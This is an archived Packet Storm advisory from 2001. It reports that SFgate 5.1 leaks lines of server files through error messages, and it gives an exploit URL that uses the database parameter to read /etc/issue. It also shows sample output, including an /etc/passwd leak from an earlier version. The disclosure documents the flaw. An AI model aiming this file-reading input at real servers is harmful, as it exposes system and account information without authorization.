exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sfgate-info.txt

sfgate-info.txt
Posted Mar 3, 2001
Authored by Krfinisterre

SFGate v5.1 p11 gives sensitive information by allowing one to view a few lines of text from a file via an error message. Exploit URL included.

tags | exploit
SHA-256 | 23b5c6dbb7d9d41d0c055527d9384a23aad5711aa8f39bede3e03ed4ad3d3715

sfgate-info.txt

Change Mirror Download
Vendor:
https://ls6-www.cs.uni-dortmund.de/ir/projects/SFgate/index.html

Action: attempted to notify vendor with no response.

Description:
SFGATE gives sensitive information by allowing one to view a few lines of
text from a file via an error message.

It looks like a good attempt was made at stopping this but its still
an issue in my mind.

The current patch level of SFgate 5.1 is 11.

example
https://xxxxxx/cgi-bin/SFgate?test=help&database=/etc/issue

SFgate terminated

SFgate terminated with message

Error with /etc/issue: syntax error at /etc/issue line 2, near "Linux 5.0"
this is out of etc issue ----^



Please contact the webmaster.
This page was generated by SFgate 5.111.

It looks like an early attempt at filtering was made.

Similar error messages with earlier versions...

SFgate terminated

SFgate terminated with message

Error with /etc/passwd: Unrecognized character \241 at /etc/passwd line 41.

Please contact the webmaster.


This page was generated by SFgate 5.018.

Other versions were not so harsh on the Unrecognized chars revealing more.
As usual permission of the web server comes in to play.

krfinisterre@checkfree.com

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close